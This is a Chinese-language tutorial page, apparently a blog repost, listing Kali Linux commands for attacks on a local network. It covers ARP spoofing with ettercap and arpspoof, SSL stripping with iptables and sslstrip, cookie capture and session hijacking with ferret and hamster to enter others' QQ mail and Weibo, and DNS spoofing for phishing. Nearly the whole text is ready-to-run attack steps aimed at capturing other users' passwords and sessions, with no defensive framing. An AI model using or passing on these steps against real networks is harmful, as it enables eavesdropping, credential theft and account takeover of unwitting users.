arp欺骗 DNS欺骗 会话劫持

【1】局域网中嗅探钓鱼 攻击arp欺骗 DNS欺骗 会话劫持
(1)arp欺骗–ettercap 相关文章http://www.91ri.org/4408.html
kali linux:
1.修改
vim /etc/NetworkManager/NetworkManager.conf
managed=true
重启网卡 service network-mannager restart
2.修改ettercap配置文件
vim /etc/ettercap/etter.conf
ec_uid=0 ec_gid=0
将iptables注释打开,如下在这里插入图片描述
echo 1>>/proc/sys/net/ipv4/ip_forward //ip转发功能开启
ettercap -i eth0 -Tq(文本和安静模式下) -M arp:remote /192.168.81.20/ /192.168.81.1/
// //监听所有网段 捕获敏感数据(网址和账号和密码)
输入参数 L ,1
drifnet -i eth0 嗅探图片访问工具
(2)arp欺骗–arpspoof
echo 1>>/proc/sys/net/ipv4/ip_forward
arpspoof -i eth0 -t 192.168.81.1(网关) 192.168.81.132(本机)
drifnet -i eth0 嗅探图片访问工具
`数据包捕获 tcpdump wireshark drafnet(自动化工具)
tcpdump -i eth0 -w 123 .dump
(3)SSL数据嗅探
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000(设置)
sslstrip -p -l 10000 -w log.txt
ettercap -i eth0 -Tq(文本和安静模式下) -M arp:remote // //
然后通过网段其他电脑的登录需要输入账号和密码的网站登录
(4)session劫持-arp欺骗
tcpdump -i eth0 -w qq.cap
ferret -r qq.cap(32位有此插件 64位需单独安装)
hamster
浏览器设置代理 hamster 127.0.0.1 1234
http://hamster(可以查看到qq.cap内的cooke,找到链接直接进入qq邮箱和微博)
选择目标
测试session
iptables -t nat -D PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000(删除)
/etc/source.list(64位kailinux 无ferret工具此方法安装)
arp欺骗 DNS欺骗 会话劫持_第1张图片
arp欺骗 DNS欺骗 会话劫持_第2张图片
(5)session劫持-DNS欺骗(钓鱼攻击)
ettercap -i eth0 -Tq(文本和安静模式下) -M arp:remote // //
1.使用ettercap进行arp欺骗,vim /etc/ettercap
192.168.14.132为kailnux本机ip地址在这里插入图片描述
2.修改etter.dns文件 vim /etc/ettercap/etter.dns
3.启用dns_spoof(在执行ettercap命令后输入),激活需要几分钟时间
4.测试dns劫持是否成功
arp欺骗 DNS欺骗 会话劫持_第3张图片

你可能感兴趣的:(网络安全)